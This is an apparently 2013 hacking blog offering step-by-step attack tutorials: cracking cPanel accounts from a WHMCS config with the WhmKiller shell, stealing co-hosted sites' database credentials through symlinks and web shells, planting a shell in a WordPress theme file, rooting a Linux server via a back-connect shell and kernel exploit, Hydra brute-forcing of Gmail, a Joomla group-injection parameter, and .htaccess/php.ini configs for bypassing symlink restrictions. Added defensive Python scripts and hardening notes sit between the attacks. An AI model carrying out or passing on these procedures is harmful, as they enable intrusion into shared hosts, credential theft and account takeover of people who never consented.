Wednesday, July 31, 2013

WhatWeb – Website Identification Tool | Backtrack

According to their website, WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1000 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.




Features:



  • Over 1000 plugins

  • Control the trade-off between speed/stealth and reliability

  • Plugins include example URLs

  • Performance tuning. Control how many websites to scan concurrently.

  • Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB, SQL.

  • Proxy support including TOR

  • Custom HTTP headers

  • Basic HTTP authentication

  • Control over webpage redirection

  • Nmap-style IP ranges

  • Fuzzy matching

  • Result certainty awareness

  • Custom plugins defined on the command line

Procedure

How to open it:-



  • Go to Backtrack >> Information Gathering >> Web Application Analysis >> CMS Identification >> whatweb, or open a terminal and change into the tool's directory: cd /pentest/enumeration/web/whatweb

Simple Usage:-





  • ./whatweb <url>

Aggression Level Usage:-

  • There are four aggression levels:

    1. Passive (WhatWeb calls it stealthy): one HTTP request per target, the default
    2. Polite: reserved in the numbering and not implemented
    3. Aggressive: when a passive match suggests a plugin, sends that plugin's extra requests to confirm it and pin down the version
    4. Heavy: sends every plugin's extra requests to every target, the slowest and noisiest option

  • To set the level, run ./whatweb -a <level no., default is 1> <url>

  • Levels 3 and 4 show up clearly in the target's web server logs, so pick the level to match the stealth requirements of the engagement; level 1 is the one to use when the target must not notice the scan.

Verbose Mode Usage:-

  • To use verbose mode, run ./whatweb -v <url>. Verbose output lists, for each plugin that matched, a description and the strings or versions it matched on, which is what you need when a result looks wrong.
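WhatWeb's --log-json=FILE option gives the format that is easiest to post-process. The following is an added example and is not part of the original post or of WhatWeb itself: it loads a JSON log (the sample below is constructed by hand in the target/http_status/plugins layout WhatWeb writes, one object per line, with a certainty key present only for matches below 100) and reduces it to the two things you act on after a scan: which versioned components to check against a vulnerability database, and which results came from low-certainty matches and deserve a closer look.

```python
import json

# Constructed sample in the shape of WhatWeb's --log-json output: one JSON
# object per scanned target, plugin results keyed by plugin name, values as
# lists, and a "certainty" key only when the match was below 100. It is not
# real scan output.
SAMPLE_LOG = r'''
{"target":"http://www.example.com/","http_status":200,"plugins":{"HTTPServer":{"os":["Ubuntu Linux"],"string":["Apache/2.2.22 (Ubuntu)"]},"Apache":{"version":["2.2.22"]},"WordPress":{"version":["3.5.1"]},"JQuery":{"version":["1.8.3"]},"PHP":{"version":["5.3.10"]}}}
{"target":"http://shop.example.com/","http_status":200,"plugins":{"HTTPServer":{"string":["nginx/1.2.1"]},"Joomla":{"certainty":75},"Email":{"string":["admin@example.com"]}}}
'''


def load_whatweb_json(text):
    """Return the list of per-target result objects from a --log-json file.

    Handles both layouts WhatWeb has used: newline-delimited objects and a
    single JSON array wrapping them.
    """
    text = text.strip()
    if not text:
        return []
    try:
        data = json.loads(text)
        return data if isinstance(data, list) else [data]
    except json.JSONDecodeError:
        return [json.loads(line) for line in text.splitlines() if line.strip()]


def summarize(results):
    """Flatten results into one row per (target, plugin)."""
    rows = []
    for result in results:
        for plugin, detail in sorted(result.get("plugins", {}).items()):
            rows.append({
                "target": result["target"],
                "status": result.get("http_status"),
                "plugin": plugin,
                "certainty": detail.get("certainty", 100),
                "version": detail.get("version", []),
                "string": detail.get("string", []),
            })
    return rows


def versioned_components(results, min_certainty=100):
    """target -> {plugin: version} for components that reported a version with
    at least min_certainty; these are the findings to check against a
    vulnerability database."""
    out = {}
    for row in summarize(results):
        if row["version"] and row["certainty"] >= min_certainty:
            out.setdefault(row["target"], {})[row["plugin"]] = row["version"][0]
    return out


def low_certainty(results, threshold=100):
    """(target, plugin, certainty) for fuzzy matches that deserve a manual look
    (or a rescan at a higher aggression level) before being reported."""
    return [(row["target"], row["plugin"], row["certainty"])
            for row in summarize(results) if row["certainty"] < threshold]


if __name__ == "__main__":
    scan = load_whatweb_json(SAMPLE_LOG)
    for target, components in versioned_components(scan).items():
        print(target, components)
    print("low certainty:", low_certainty(scan))
```

Run WhatWeb with ./whatweb --log-json=scan.json <url> and feed the file to load_whatweb_json; a Joomla match at certainty 75, as in the sample, is the kind of result to confirm with a level 3 rescan before it goes into a report.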



Crack cPanels using WhmKiller Shell

For educational purposes only! I will not take responsibility for you!


Hello Readers!! Today I'm going to show you how to crack cPanel passwords using the WhmKiller shell.


Requirements:-

  • Access to the server that hosts the target's WHMCS installation (the WhmKiller shell has to be uploaded to it)

  • The WhmKiller PHP shell

Before we begin, if you are new to this field, read an article on anonymity first.

Procedure:-

  • First find the WHMCS config file. Copies of it often turn up under names such as xyz-billing.txt or xyz-clients.txt, but every one has the layout of WHMCS's configuration.php: it sets db_host, db_username, db_password, db_name and cc_encryption_hash.



  • After finding the WHMCS config file, upload the WhmKiller shell (from the requirements) to the server and open it in your browser.




  • In the db_host box, paste the host from the config file. Usually it is localhost.

  • Do the same for db_username, db_password, db_name and cc_encryption_hash: copy each value from the config file into its box, then click Submit.

  • If the credentials are valid, you are redirected to the main page of the shell.



Then open the Clients Hosting Accounts section. WHMCS stores each client's hosting-account password encrypted with cc_encryption_hash, which is why the shell asked for that key: it decrypts them and lists the cPanel username and password of every hosted account.




  • That's it: log in with one of those accounts at xyz.com:2082 or <site_ip>:2082 (2082 is cPanel's plain HTTP port, 2083 the HTTPS one).

The whole attack depends on being able to read the WHMCS config file. If you run WHMCS on a shared host, keep configuration.php mode 0600 and owned by the account that runs PHP, never leave copies of it in text files under the web root, and treat cc_encryption_hash as a secret on the same level as the database password: with it, every stored hosting-account password can be decrypted.
How to use Joomscan | Backtrack 5 R3

Introduction

Joomscan is a Joomla vulnerability scanner. It fingerprints the Joomla version of a target site and reports the known file inclusion, SQL injection and command execution vulnerabilities for that version and for the components it detects.


In this tutorial I’ll show you the usage and how to find vulnerabilities by joomscan.


Procedure

How to open it:-

  • Go to Backtrack >> Vulnerability Assessment >> Web Application Assessment >> CMS Vulnerability Identification >> joomscan, or open a terminal and run cd /pentest/web/joomscan.



How to use it:-




  • To scan a targeted web site, use this command perl ./joomscan.pl -u <url>




  • To scan a targeted web site through a proxy, use this command: perl ./joomscan.pl -u <url> -x ip:port



That's it. There are a few more options available for this tool; run perl ./joomscan.pl with no arguments to list them. Keep in mind that joomscan only knows the vulnerabilities in its own database, so update it before a scan and treat a clean result as "nothing known", not as "nothing there".

How to hack sites using symlink

For educational purposes only! I will not take responsibility for you!


Today I will show you how to take over other websites hosted on the same server using symlinks. I am not going to explain what a symlink is. So let's begin.


Requirements:-

  • A shelled website, i.e. a site on the server where you already have a web shell

  • Some PHP and Perl helper files which do the symlinking (config.pl,
 nsuser.php and ida.php below). The original post linked a download for them.


So now lets begin.


First I want to make clear that this mostly works on WordPress and Joomla sites only: their configuration files (wp-config.php and configuration.php) keep the database credentials in a fixed, well-known place, which is what the helper scripts look for.



  • First open your shelled site and create a new directory with whatever name you want, e.g. xyz.

  • Upload the helper files from the requirements into that directory.

  • Click on the permissions field (-rw-r--r--) of config.pl and change the value from 0644 to 0755. config.pl is a Perl CGI script, and the web server will only run it if it is executable.




  • Then open config.pl in the browser. In my case that is http://www.example.com/xyz/config.pl.

  • You will see a page with a text box.




  • Leave this tab open and open nsuser.php in another one. In my case it is at http://www.example.com/xyz/nsuser.php.

  • Click on Eval.



A window with a Go button opens.




  • Click on the Go button.

  • You will get a block of text listing the user accounts on the server. Copy it.



Paste it into the box on the config.pl tab you opened earlier and click Dapatkan Config! (Indonesian for "Get Config!"). The script goes through the users you pasted, symlinks each one's configuration file into your directory and saves what it reads as .txt files.



  • Go back to the directory where you uploaded the files. In my case that was http://www.example.com/xyz/

  • In that directory you now have the config files of the sites hosted on the server.

[Brief note on config files: they are the files that hold the database name, the database username and the password.]




  • That part is done.

You now have the database name, the database username and the password.

Maybe you are wondering how to connect to the database and where to put these credentials. So let's continue:-



  • Open ida.php from the directory you uploaded to. In my case it is at http://www.example.com/xyz/ida.php.

  • A window with the shell's menu opens.




  • Click on sql.

  • Then fill in:
    Login - the database username
    Password - the database password
    Database - the database name




  • Click on the double arrow ">>" button.

  • You are now connected to the database.

  • Tick the users table, wp_users for WordPress or jos_users for Joomla, and click dump.



[Note: the table prefix is configurable in both CMSs, so the users table may carry a different prefix than wp_ or jos_. Look for the table whose name ends in _users.]



  • The dump.sql file is saved where you uploaded the other files. In my case it was saved at http://www.example.com/xyz/dump.sql.

  • Open dump.sql.

  • Boom!! Now we have the admin username, password hash and email. Both WordPress and Joomla store password hashes rather than passwords, so what you have is a hash to crack, not a password to type.

  • Once the hash is cracked, use the credentials to log in to the admin panel.


But now you may ask where to put these credentials, and how to tell which site they belong to. So let's continue.

  • Copy the database username [the db_user value found in the config file you saved as .txt].

  • In my case the db_user is localbus_main.

  • Open ida.php again and go to the Symlink section by clicking on Symlink.




  • Click on Whole Server Symlink. You get a long list of the sites hosted on the server, one per account.

  • To find the site that goes with your credentials, press Ctrl+F and search for the db_user name.

  • On cPanel hosts the database user is prefixed with the account name, so localbus_main belongs to the account localbus; search for localbus rather than the full name.


  • The targeted site is listed next to that username. Now log in to your targeted site.


Sniffing FTP Password Through Wireshark

For educational purposes only! I will not take responsibility for you!


Here I will demonstrate how to sniff packets with Wireshark. Having gone through some networking basics, we are now ready for a practical example. As I said before, FTP and HTTP are two of the application protocols that pass the username and password across the network in clear text, so here we will sniff a victim's FTP login.


Install and run Wireshark



Go to ‘Capture‘ and select ‘Interfaces’ from the drop-down.



I select the VMware network adapter, since I am using VMware for this demonstration, and go to Options.



Check that the Promiscuous mode box is ticked. I also used a Capture filter to narrow the sniffed packets to the IP of interest (in BPF syntax, host <ip>). Promiscuous mode only helps on a hub, a mirrored port or a virtual network like this one; on a switched LAN you see only traffic to and from your own machine unless you redirect it (for example with ARP spoofing). Done with the settings, press Start and wait for the victim to log in to the FTP server. I am using Ubuntu at the victim end, on the same network.



I have set up the FTP server at 192.168.48.128. As soon as the victim logs in, the login details are captured and listed:



Check the rows highlighted in blue in the above snapshot: one shows the USER command with the victim's username, the other the PASS command with the password. Rather than scrolling, apply the display filter ftp.request.command == "USER" || ftp.request.command == "PASS", or right-click a packet and choose Follow TCP Stream to read the whole control session. I hope this was informative.
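The same extraction can be done offline from a saved capture. Here is an added example, written for this post and not part of it or of Wireshark: it builds a small pcap in memory (constructed packets, not a real capture, with the server at the post's 192.168.48.128 and the client address and credentials made up), parses the Ethernet/IPv4/TCP headers by hand, reassembles each client-to-server FTP control stream and pulls out the USER/PASS pairs, including one login whose PASS command is split across two segments. It does for a pcap what the display filter above does interactively.

```python
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def _ip4(dotted):
    return bytes(int(part) for part in dotted.split("."))


def _frame(src_ip, dst_ip, sport, dport, payload):
    """Ethernet/IPv4/TCP frame for test data. Checksums are left at zero: the
    parser does not verify them, and these bytes never go on a wire."""
    eth = bytes(12) + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64,
                     IPPROTO_TCP, 0, _ip4(src_ip), _ip4(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Classic little-endian pcap: 24-byte global header, 16-byte record headers."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    records = b"".join(struct.pack("<IIII", 1375000000 + i, 0, len(f), len(f)) + f
                       for i, f in enumerate(frames))
    return header + records


CLIENT, SERVER = "192.168.48.1", "192.168.48.128"   # server IP from the post

# Constructed capture of two FTP logins; the second PASS command arrives
# split over two segments, which a per-packet grep would miss.
SAMPLE_PCAP = build_pcap([
    _frame(SERVER, CLIENT, 21, 40001, b"220 (vsFTPd 2.3.5)\r\n"),
    _frame(CLIENT, SERVER, 40001, 21, b"USER alice\r\n"),
    _frame(SERVER, CLIENT, 21, 40001, b"331 Please specify the password.\r\n"),
    _frame(CLIENT, SERVER, 40001, 21, b"PASS s3cret!\r\n"),
    _frame(SERVER, CLIENT, 21, 40001, b"230 Login successful.\r\n"),
    _frame(CLIENT, SERVER, 40002, 21, b"USER bob\r\nPA"),
    _frame(CLIENT, SERVER, 40002, 21, b"SS hunter2\r\n"),
])


def tcp_payloads(pcap):
    """Yield (src, dst, sport, dport, payload) for every TCP segment."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    if struct.unpack_from(endian + "I", pcap, 20)[0] != 1:
        raise ValueError("only Ethernet link-layer captures are handled")
    offset = 24
    while offset + 16 <= len(pcap):
        incl_len = struct.unpack_from(endian + "IIII", pcap, offset)[2]
        offset += 16
        frame = pcap[offset:offset + incl_len]
        offset += incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != IPPROTO_TCP:
            continue
        total_len = struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_offset = (tcp[12] >> 4) * 4
        yield (".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20])),
               sport, dport, tcp[data_offset:])


def extract_ftp_logins(pcap, ftp_port=21):
    """Reassemble each client-to-server control stream (segments assumed in
    order, no retransmissions) and return the USER/PASS pairs found in it."""
    streams = {}
    for src, dst, sport, dport, payload in tcp_payloads(pcap):
        if dport == ftp_port and payload:
            key = (src, sport, dst)
            streams[key] = streams.get(key, b"") + payload
    logins = []
    for (src, sport, dst), data in streams.items():
        user = None
        for line in data.decode("ascii", "replace").split("\r\n"):
            verb, _, argument = line.partition(" ")
            if verb.upper() == "USER":
                user = argument
            elif verb.upper() == "PASS" and user is not None:
                logins.append({"client": src, "client_port": sport, "server": dst,
                               "user": user, "password": argument})
                user = None
    return logins


if __name__ == "__main__":
    for login in extract_ftp_logins(SAMPLE_PCAP):
        print(login)
```

To use it on a real file, read the bytes of a capture saved by Wireshark in pcap (not pcapng) format and pass them to extract_ftp_logins. The reassembly is deliberately naive: it concatenates segments in capture order, which is enough for a clean LAN capture but not for lossy ones.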

Direct Shell Upload in WordPress

For educational purposes only! I will not take responsibility for you!


I had kept this topic on hold for a long time, as it was planned to be the last of the recent posts on exploiting WordPress. It involves replacing the code of a theme file with a shell, and that only after the login has been cracked with a WordPress login brute force or obtained through a symlink bypass on a vulnerable server, i.e. only after the attacker has already logged in to the victim's dashboard.


So let’s check out how exactly this is accomplished.


The attacker logs into the victim’s account Dashboard, goes to the Appearance menu on the left hand side and selects the submenu ‘Editor‘ as shown below:



Clicking on ‘Editor‘, the attacker lands in the editor for ‘style.css’ of the currently active theme. In the file list on the right, click ‘comments.php’ as shown:



Now the ‘comments.php‘ opens in the editor. The attacker deletes the current content of the file and puts in his own shell code as shown:


I have entered custom PHP code for the demo; an attacker enters his own PHP shell instead. Update the file, open the browser and go to something like:


http://127.0.0.1/wordpress/wp-content/themes/assembler/comments.php


 


This runs ‘comments.php’ directly on the server, and with it the malicious shell, which can then be used to deface the website.


You might be wondering: since the attacker is already logged in to the dashboard, what is the point of uploading a shell?

The answer is that dashboard access is not the end goal. The theme editor only reaches files inside the active theme, whereas a shell runs with the web server's privileges and can reach the site's main index.php (and everything else the web user can write), which is what the attacker modifies for a complete defacement.

The one-line fix for this particular step is define('DISALLOW_FILE_EDIT', true); in wp-config.php, which removes the theme and plugin editors from the dashboard entirely. It does not stop an attacker with admin access from uploading a plugin or theme, so keep the theme files read-only for the web user and watch them for changes.


This is it. I hope this was worth looking at. You might have read several topics on the same but this was my way to presenting it. Thank you all and stay tuned!
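What the defender wants from this post is a way to notice that comments.php changed. The following is an added example, not code from the post or from WordPress: it records SHA-256 hashes of a theme's files as a baseline (in practice, right after installing the theme from a trusted package), reports files modified, added or missing since, and scans the changed ones for PHP functions a template has no reason to call. The theme name (assembler, from the post) and all file contents are constructed for the example.

```python
import hashlib
import re

# Constructed stand-in for the active theme's files ("assembler" in the post).
CLEAN_THEME = {
    "assembler/style.css": b"/* Theme Name: Assembler */ body { margin: 0; }\n",
    "assembler/index.php": b"<?php get_header(); ?>\n<?php get_footer(); ?>\n",
    "assembler/comments.php": b"<?php if (post_password_required()) { return; } ?>\n",
}

# The same theme after the attack in the post: comments.php replaced with a
# shell stub and an extra file dropped next to it (constructed content).
TAMPERED_THEME = dict(CLEAN_THEME)
TAMPERED_THEME["assembler/comments.php"] = b"<?php eval(base64_decode($_POST['p'])); ?>\n"
TAMPERED_THEME["assembler/wp-shell.php"] = b"<?php system($_GET['c']); ?>\n"

# Functions a theme template has no business calling. A hit means "read this
# file", not "compromised": plugins and legitimate code occasionally use them.
SUSPICIOUS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    r"base64_decode|gzinflate|str_rot13|create_function)\s*\(", re.I)


def file_hashes(files):
    """files: {path: bytes} -> {path: sha256 hex}. On a real site, walk the
    theme directory and read each file instead of using a dict."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def compare_to_baseline(baseline, current):
    """Report what changed since the baseline hashes were recorded."""
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "missing": sorted(p for p in baseline if p not in current),
    }


def suspicious_php(data):
    """Names of suspicious functions called in a PHP source, deduplicated."""
    text = data.decode("utf-8", "replace")
    return sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(text)})


def audit_theme(baseline, files):
    """Integrity diff plus a suspicious-function scan of every changed file."""
    report = compare_to_baseline(baseline, file_hashes(files))
    report["suspicious"] = {}
    for path in report["modified"] + report["added"]:
        hits = suspicious_php(files[path])
        if hits:
            report["suspicious"][path] = hits
    return report


BASELINE = file_hashes(CLEAN_THEME)  # record this when the theme is installed

if __name__ == "__main__":
    print(audit_theme(BASELINE, TAMPERED_THEME))
```

Store the baseline outside the web root (the attacker in this post can edit anything the theme editor reaches) and run the audit from cron; a modified comments.php carrying eval and base64_decode is exactly what the attack above leaves behind.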


 



Linux Server Rooting

For educational purposes only! I will not take responsibility for you!


In this post I will demonstrate how to root a Linux server from a shell uploaded to it. I will go step by step.


Assume I have already uploaded a shell to some website on the server, edited so that its back-connect feature points at the attacker's IP and a port of his choosing, as shown below:



Now, the attacker with the IP ‘192.168.48.189‘ starts listening for a connection through Netcat as:



Now, my shell on the server looks something like:



with several PHP backconnect links. As soon as I click on one of them, the terminal window which was listening for the connection, shows up like this:



Type uname -a to get the kernel version the server is running (plain uname prints only "Linux"):



Cool, it’s 3.0.0-12-generic! The attacker googles for the version’s exploit by searching ‘Linux server 3.0.0-12-generic exploit‘ and gets one for him. In our case let it be ‘exploit.c‘


Now, traverse to the ‘/tmp‘ directory, which is always writable. Next, the attacker creates a custom directory there (say ‘exploit‘ ) as:



The attacker has created the ‘exploit‘ directory and put exploit.c in it. Next he compiles exploit.c into an output file (say ‘rooted‘) in the same directory. This needs gcc on the server; if it is missing, the exploit has to be compiled elsewhere for the same architecture and libc and uploaded as a binary. The attacker proceeds like:



Almost done. The attacker now makes rooted executable; the post uses chmod 777, although chmod +x is all that is needed:



Now execute the output file and done!


The attacker types ‘id‘ and he can see that he has successfully gained the root access to the server.


 

Tuesday, July 30, 2013

Hack Gmail Password Account using Hydra

Here is a small tutorial for those who keep asking how to hack a Gmail account. Open a terminal in Kali and start xhydra, Hydra's GTK front end, or find it in the menu:

Kali Linux -> Password Attacks -> Online Attacks -> Hydra. When it opens, select the Target tab and enter


Single Target: smtp.gmail.com


Protocol: smtp. Now in the Passwords tab, enter


Username: Type Victim Email ID


In the password section, select the Password List option and browse to your wordlist file. (Note: the attack only succeeds if the real password is in the list, so a custom list built around the target beats a generic one.) One list is linked at http://adf.ly/T9IfX.

Now we are ready to attack: click Start and wait; if the password is in the list, Hydra reports it.

Two caveats before you expect this to work against Gmail. smtp.gmail.com only accepts authentication over TLS (SMTPS on port 465 or STARTTLS on 587), so the target port and Hydra's SSL option (-S on the command line, the Use SSL box in the GUI) have to match. And Google rate-limits and locks an account after a small number of failed logins, which is exactly the control an online brute force runs into, so against a real Gmail account this approach rarely gets anywhere. Wordlists downloaded through ad-link shorteners should be treated as untrusted files.



Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability

 


#Haxor32


Joomla! 1.6.x/1.7.x/2.5.0-2.5.2 suffers from a privilege escalation vulnerability that allows users to be registered into any group not having ‘core.admin’ privileges.


In order to be exploited, an attacker must visit index.php?option=com_users&view=registration and start creating a new user. During the initial creation, the attacker must cause the registration to fail by either NOT using the same password in both password fields or by purposefully failing the captcha (in 2.5.x). Before submitting the form, the attacker can use Firebug/Tamper Data to add the following parameter to the form data (assuming the site still has the default user groups enabled):



  • Firebug: <input name="jform[groups][]" value="7" />

  • Tamper Data: jform[groups][]=7


The form should reload, complaining that the passwords didn’t match. This causes the group data to be stored into the session as form data. Once this is complete, giving valid values for the password fields and re-adding the parameter from before will cause the newly registered user to be assigned to the “Administrator” group because the user registration model reassigns the user to any group found to already exist in the session form data (but NOT to the groups directly given in the request).


After activating the account, the attacker will have a valid account with permissions to log in to the administrator/ interface, edit one of the templates, and inject php code (assuming the stock permissions/user groups are still in effect). Joomla! versions 1.6.x and 1.7.x also allow users in the “Administrator” group to install extensions, thus opening another avenue for code injection.


Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.
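To see why the two-step sequence matters, here is an added example that models the flawed logic the advisory describes and the obvious fix; it is Python written for this page, not Joomla's code. register_vulnerable stashes the whole failed form in the session and trusts the groups it finds there on the next attempt; register_fixed never takes groups from the client at all. The group IDs are Joomla's defaults (7 = Administrator); the usernames and the session layout are assumptions made for the example.

```python
# Joomla's default user groups (ID -> name); 7 is the one the advisory targets.
DEFAULT_GROUPS = {1: "Public", 2: "Registered", 3: "Author", 4: "Editor",
                  5: "Publisher", 6: "Manager", 7: "Administrator", 8: "Super Users"}
NEW_USER_GROUP = 2  # what the site configures as the registration group


def register_vulnerable(session, form):
    """Model of the flawed flow from the advisory: a failed submission keeps
    the whole form (groups included) in the session, and the next successful
    submission assigns whatever groups that stash contains. Groups sent
    directly with the successful request are ignored, as the advisory notes."""
    if form["password1"] != form["password2"]:
        session["form_data"] = dict(form)          # jform[groups][] survives here
        return {"error": "Passwords do not match"}
    stashed = session.pop("form_data", {})
    groups = stashed.get("groups") or [NEW_USER_GROUP]
    return {"user": form["username"], "groups": sorted(set(groups))}


def register_fixed(session, form):
    """Hardened flow: client-supplied groups are dropped before anything is
    stored, and the group always comes from configuration."""
    safe = {k: v for k, v in form.items() if k != "groups"}
    if safe["password1"] != safe["password2"]:
        session["form_data"] = safe
        return {"error": "Passwords do not match"}
    session.pop("form_data", None)
    return {"user": safe["username"], "groups": [NEW_USER_GROUP]}


def attack(register, wanted_group=7):
    """Replay the advisory's two-step sequence against a registration flow:
    first a deliberately failing submission carrying jform[groups][]=7, then
    a valid one. Returns the final registration result."""
    session = {}
    failing = {"username": "mallory", "email": "m@example.com",
               "password1": "a", "password2": "b", "groups": [wanted_group]}
    valid = dict(failing, password2="a")
    register(session, failing)
    return register(session, valid)


def group_names(result):
    return [DEFAULT_GROUPS[g] for g in result["groups"]]


if __name__ == "__main__":
    print("vulnerable:", group_names(attack(register_vulnerable)))
    print("fixed:     ", group_names(attack(register_fixed)))
```

The general lesson is the one the fix encodes: anything persisted from a failed form submission must be filtered to the fields the user is allowed to set before it is stored, because the re-population path usually skips the validation the direct path has.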

Joomla and WordPress sites Finder and Brute Forcer

#Haxor32


The archive contains:

1. Joomla BruteForcer PHP Shell
2. WordPress BruteForcer PHP Shell
3. Joomla Sites Finder from a Server PHP Shell
4. WordPress Sites Finder from a Server PHP Shell
5. Private 1337day Server Exploiter to Auto Find and BruteForce Joomla and WordPress Sites
6. WordPress Brute Forcer Software to Work Faster with a Big Pass List

Enjoy guys.


 Download Direct: http://0453f0cc.linkbucks.com/


WordPress Scanner v 1.0

Hi all my friends, today I present a nice tool for WordPress: it scans a site running WordPress, checks it for the vulnerabilities it knows about, lets you verify an exploit on localhost, and uses remote code execution to inject a script and modify the website.



Bypass Symlink in Apache Servers

Hello everybody, today I'm going to explain how to bypass the symlink restriction on OVH servers; most people run into problems on OVH when trying to symlink. This method was found by Mauritania Attacker and was private, but I decided to publish it.



First create a directory, call it whatever you want, for example "Hak", then create a ".htaccess" file in the folder "Hak":


CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .lnx
AddHandler cgi-script .lnx



Secondly we create a second folder, for example "Haksecurity", and also give it an ".htaccess" file:


CODE:

#Developped by Mauritania Attacker
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes

AddType text/plain .php
AddHandler server-parsed .php

AddType root .root
AddHandler cgi-script .root



Then, also in the folder "Haksecurity", we create a file called "php.ini":


CODE:

safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On


So here we come to the last part!

To retrieve the configs, run the following command:

ln -s / Haksecurity

Here we go, we have successfully linked the root of the filesystem into our directory. Now, to find the configs, upload a Perl script into "Haksecurity" and paste it the server's user list from /etc/passwd; each user's home directory holds that site's configuration file, and the rest is the same as in the symlink post above.

A few notes on why this works, and how a host stops it. Only the first four php.ini lines do anything: exec and shell_exec are not php.ini directives (they are re-enabled simply by emptying disable_functions), and a per-directory php.ini is read at all only when PHP runs as CGI/FastCGI (suPHP and the like), not under mod_php. The .htaccess part depends on AllowOverride permitting Options and on Apache following a link that one customer created into another customer's files. Limiting AllowOverride so that Options cannot be overridden, using SymLinksIfOwnerMatch instead of FollowSymLinks, running each account's PHP as its own user, and keeping configuration files mode 0600 each break a step of this chain.
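Both symlink posts on this page (How to hack sites using symlink, above, and this one) come down to the same two conditions on the host: a symlink inside one customer's web root that resolves outside it, and an .htaccess that enables FollowSymLinks or maps extensions to CGI/SSI handlers. The following is an added example, written for this page and not part of either post: a small Python audit that walks a web root, flags symlinks escaping it and flags the risky directives, run here against a throwaway directory built to mirror the Haksecurity setup above (the directory names and file contents are constructed for the example).

```python
import os
import re
import tempfile

# .htaccess directives that build the setup described in the two symlink
# posts. The lookbehind keeps "-FollowSymLinks" (disabling) from matching.
RISKY_DIRECTIVES = [
    (re.compile(r"^\s*Options\b[^#]*(?<![-\w])FollowSymLinks", re.I),
     "FollowSymLinks: links are followed regardless of owner (use SymLinksIfOwnerMatch)"),
    (re.compile(r"^\s*Options\b[^#]*(?<![-\w])ExecCGI", re.I),
     "ExecCGI: scripts in this directory can be executed"),
    (re.compile(r"^\s*AddHandler\s+cgi-script\b", re.I),
     "custom extension mapped to cgi-script"),
    (re.compile(r"^\s*AddHandler\s+server-parsed\b", re.I),
     "server-parsed handler: SSI on a user-controlled extension"),
    (re.compile(r"^\s*AddType\s+text/plain\s+\.php\b", re.I),
     "PHP sources served as plain text (config files become readable)"),
    (re.compile(r"^\s*AddType\s+application/x-httpd-cgi\b", re.I),
     "CGI MIME type attached to a custom extension"),
]


def risky_directives(htaccess_text):
    """(line number, line, reason) for each risky directive; comments skipped."""
    findings = []
    for number, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for pattern, reason in RISKY_DIRECTIVES:
            if pattern.search(line):
                findings.append((number, line.strip(), reason))
    return findings


def escapes_root(root, link_path, target):
    """True if a symlink at link_path pointing at target resolves outside root."""
    root = os.path.realpath(root)
    resolved = os.path.realpath(os.path.join(os.path.dirname(link_path), target))
    return os.path.commonpath([root, resolved]) != root


def audit_tree(root):
    """Walk a web root without following links; report escaping symlinks and
    risky .htaccess directives, both relative to root."""
    escaping, htaccess = [], []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.readlink(path)
                if escapes_root(root, path, target):
                    escaping.append((os.path.relpath(path, root), target))
            elif name == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for number, _line, reason in risky_directives(fh.read()):
                        htaccess.append((os.path.relpath(path, root), number, reason))
    return {"escaping_symlinks": sorted(escaping), "htaccess": sorted(htaccess)}


def demo():
    """Build a throwaway web root mirroring the Haksecurity setup and audit it.
    Directory names and contents are constructed for the example."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Haksecurity"))
        os.makedirs(os.path.join(root, "blog"))
        with open(os.path.join(root, "Haksecurity", ".htaccess"), "w") as fh:
            fh.write("Options +FollowSymLinks\nAddType text/plain .php\nAddHandler cgi-script .root\n")
        with open(os.path.join(root, "blog", ".htaccess"), "w") as fh:
            fh.write("Options -Indexes +SymLinksIfOwnerMatch\n")   # the safe variant
        os.symlink("/", os.path.join(root, "Haksecurity", "root"))        # ln -s / ...
        os.symlink("../blog", os.path.join(root, "Haksecurity", "blog"))  # stays inside
        return audit_tree(root)


if __name__ == "__main__":
    print(demo())
```

On a shared host, run audit_tree over every account's document root from cron; a symlink whose target leaves the root, or an .htaccess that re-types .php as text/plain, is the footprint of exactly the procedure described in these two posts.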

Sunday, July 28, 2013

New Forum about Pentest, Hacking, Security

Here is a new forum where you can learn about pentesting and security. We will try to answer all your questions.

When you register, write something about yourself.


Forum: http://haksecurity.com/forum

